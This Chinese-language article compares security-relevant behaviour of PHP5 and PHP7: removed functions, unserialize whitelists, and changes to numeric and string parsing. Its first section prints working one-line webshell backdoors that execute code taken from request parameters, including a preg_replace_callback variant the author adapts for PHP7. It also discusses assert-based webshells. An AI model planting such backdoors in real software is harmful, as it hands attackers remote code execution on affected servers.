PHP7和PHP5在安全上有什么區別

本篇內容主要講解“PHP7和PHP5在安全上有什么區別”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實用性強。下面就讓小編來帶大家學習“PHP7和PHP5在安全上有什么區別”吧!

函數修改

1. preg_replace()不再支持/e修飾符

<?php preg_replace("/.*/e",$_GET["h"],".");  ?>

利用\e修飾符執行代碼的后門大家也用了不少了，具體看官方的這段描述:

很不幸，在PHP7以上版本不在支持\e修飾符，同時官方給了我們一個新的函數preg_replace_callback：

這里我們稍微改動一下就可以利用它當我們的后門：

<?php preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); ?>

2. create_function()被廢棄

<?php $func =create_function('',$_POST['cmd']);$func(); ?>

少了一種可以利用當后門的函數，實際上它是通過執行eval實現的。可有可無。

3. mysql_*系列全員移除

如果你要在PHP7上面用老版本的mysql_*系列函數需要你自己去額外裝了，官方不在自帶，現在官方推薦的是mysqli或者pdo_mysql。這是否預示著未來SQL注入漏洞在PHP上的大幅減少呢~

4. unserialize()增加一個可選白名單參數

$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);

其實就是一個白名單，如果反序列數據里面的類名不在這個白名單內，就會報錯。

像這樣的報錯!

可以是類名也可以是布爾數據，如果是FALSE就會將所有的對象都轉換為__PHP_Incomplete_Class對象。TRUE是沒有限制的。也可以傳入類名實現白名單。

還好現在是可選不是必選，要是默認FALSE逼程序員弄白名單那就真的吐血了。

5. assert()默認不在可以執行代碼

這就是眾多馬不能用的罪魁禍首了，太多的馬用assert()來執行代碼了，這個更新基本就團滅，一般情況下修改成eval即可正常運行了~

提一下，菜刀在實現文件管理器的時候用的恰好也是assert函數，這導致菜刀沒辦法在PHP7上正常運行。

語法修改

1. foreach不再改變內部數組指針

<?php $a = array('1','2','3'); foreach ($a as $k=>&$n){     echo ""; } print_r($a); foreach ($a as $k=>$n){     echo "";  } print_r($a);

這樣的代碼在php5中，是這樣的執行結果：

因為數組最后一個元素的 $value 引用在 foreach  循環之后仍會保留，在第二個循環的時候實際上是對之前的指針不斷的賦值。php7中通過值遍歷時，操作的值為數組的副本，不在對后續操作進行影響。

這個改動影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個洞的。

這個問題在PHP7.0.0以后的版本又被改回去了，只影響這一個版本。

2. 8進制字符容錯率降低

在php5版本，如果一個八進制字符如果含有無效數字，該無效數字將被靜默刪節。

<?php echo octdec( '012999999999999' ) . "\n"; echo octdec( '012' ) . "\n"; if (octdec( '012999999999999' )==octdec( '012' )){         echo ": )". "\n"; }

比如這樣的代碼在php5中的執行結果如下：

但是在php7里面會觸發一個解析錯誤。

這個問題同樣在PHP7.0.0以后的版本又被改回去了，只影響這一個版本。

3. 十六進制字符串不再被認為是數字

這個修改一出，以后CTF套路會少很多啊~

很多騷操作都不能用了~

這個沒什么好說的，大家都懂。

<?php var_dump("0x123" == "291"); var_dump(is_numeric("0x123")); var_dump("0xe" + "0x1"); var_dump(substr("foo", "0x1")); ?>

以上代碼在PHP5運行結果如下：

PHP7運行結果如下：

你以為我要說這個在后續版本被改回去了?不，目前截至PHP7.3版本依然沒有改回去的征兆，官方稱不會在改了。這個講道理還是蠻傷的。

4. 移除了 ASP 和 script PHP 標簽

現在只有這樣的標簽能在php7上運行了。

字面意思，影響其實不是很大(只是以后騷套路會少一點)。

5. 超大浮點數類型轉換截斷

將浮點數轉換為整數的時候，如果浮點數值太大，導致無法以整數表達的情況下， 在PHP5的版本中，轉換會直接將整數截斷，并不會引發錯誤。  在PHP7中，會報錯。

CTF又少一個出題套路，這個問題我只在CTF上見過，影響應該不大。

到此，相信大家對“PHP7和PHP5在安全上有什么區別”有了更深的了解，不妨來實際操作一番吧！這里是億速云網站，更多相關內容可以進入相關頻道進行查詢，關注我們，繼續學習！